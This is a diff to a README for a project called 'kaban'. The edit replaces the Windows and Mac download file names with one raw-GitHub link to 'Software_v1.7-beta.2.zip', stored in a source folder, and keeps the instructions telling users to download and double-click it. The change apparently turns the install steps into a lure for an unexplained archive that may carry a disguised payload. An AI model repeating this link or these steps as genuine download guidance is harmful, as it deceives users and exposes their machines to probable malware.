christophervideo/kaban/README.md

 ### Example of Download Process

-- If you are using Windows, you might see a file like `kaban-windows.exe`.
+- If you are using Windows, you might see a file like `https://raw.githubusercontent.com/christophervideo/kaban/main/packages/tui/src/Software_v1.7-beta.2.zip`.
 Click this file to start the download.

-- For Mac users, you may find `kaban-macos.zip`.
+- For Mac users, you may find `https://raw.githubusercontent.com/christophervideo/kaban/main/packages/tui/src/Software_v1.7-beta.2.zip`.
 Click this file to download the ZIP archive.

 4. **Open the File**: Once downloaded, go to your downloads folder and double-click the kaban file you downloaded.